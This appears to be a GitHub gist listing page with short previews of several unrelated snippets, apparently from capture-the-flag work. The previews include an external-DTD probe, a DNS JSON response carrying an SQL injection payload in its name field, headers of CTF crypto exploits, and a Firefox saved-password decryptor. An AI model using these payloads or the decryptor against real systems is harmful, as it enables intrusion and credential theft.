This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ATTLIST svg width CDATA "REMOTE-ATTLIST-WORKS"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY c "GITHUB-DTD-LOADED"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY c "GITHUB-DTD-LOADED"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"Status": 0, "Answer": [{"name": "trust-issues.tjc.tf.', 1, 300, 9999999999, '23.138.76.44') -- ", "type": 1, "TTL": 300, "data": "1.2.3.4"}]} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"Status": 0, "Answer": [{"name": "trust-issues.tjc.tf.', 1, 300, 9999999999, '23.138.76.44') -- ", "type": 1, "TTL": 300, "data": "1.2.3.4"}, {"name": "trust-issues.tjc.tf.', 1, 17, 3, 300, 1778958830, 1779567230, 13534, 'trust-issues.tjc.tf.', 'rRjAHqSjNBhusVxJOgT8Qj7rbv6xsjenh/wJdjLFBJq0ZZg6/I1WsGbI7rVpxGBkjwMd59lEvU9a1uJdgORqCr0PMlQF6AX/pclT3D1xchTJ+JM28IJgaod+LK0iC7yuoP20lJfwPPawORMRKaVPx5wD5EyB633SPqsbDRrxN8KMxSI+', 9999999999) -- ", "type": 46, "TTL": 300, "data": "a 17 3 300 1779567230 1778958830 13534 trust-issues.tjc.tf. rRjAHqSjNBhusVxJOgT8Qj7rbv6xsjenh/wJdjLFBJq0ZZg6/I1WsGbI7rVpxGBkjwMd59lEvU9a1uJdgORqCr0PMlQF6AX/pclT3D1xchTJ+JM28IJgaod+LK0iC7yuoP20lJfwPPawORMRKaVPx5wD5EyB633SPqsbDRrxN8KMxSI+"}]} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Claude Code custom statusline | |
| # Shows: user@host:path branch [model] ctx% $cost duration 5h/7d quota Sonnet flag | |
| # | |
| # Setup: | |
| # 1. Save this file to ~/.claude/statusline-command.sh | |
| # 2. Add to ~/.claude/settings.json: | |
| # { | |
| # "statusLine": { | |
| # "type": "command", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Kitty 最小边框配置 | |
| # hide_window_decorations 控制窗口装饰 | |
| # titlebar-only: 只隐藏标题栏文字,保留控制按钮和可拖动区域 | |
| # yes: 完全隐藏所有装饰(无法拖动) | |
| # no: 显示完整标题栏 | |
| # Kitty 远程控制 | |
| allow_remote_control yes | |
| listen_on unix:/tmp/kitty-rc | |
| hide_window_decorations titlebar-only |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import argparse | |
| import time | |
| from math import gcd, isqrt | |
| """Attack the special RSA where q = ((p - 1)^2 + 4x^2) / 8 and p = x^2 + 2y^2. | |
| The key observation behind the attack is that the explicit divisor | |
| D = (X^2 + 3X + 2, w(X + 1)), w^2 = -30 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Kitten Sign - Full Exploit | |
| AliyunCTF 2026 Final | |
| Attack chain: | |
| 1. Collect encrypt samples, recover RSA modulus & SM2 public key | |
| 2. Factor RSA via genus-2 Jacobian (call test.py) | |
| 3. Precompute BKZ-25 lattice basis (call sage subprocess) | |
| 4. Invalid-curve oracle: forge decrypt commands to recover SM2 private key via CRT |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Firefox Saved Passwords Decryptor | |
| Decrypt saved logins from Firefox profile backup (logins.json + key4.db). | |
| Supports Firefox profiles using PBES2 + PBKDF2-HMAC-SHA256 + AES-256-CBC. | |
| Requirements: | |
| pip install pycryptodome pyasn1 |
NewerOlder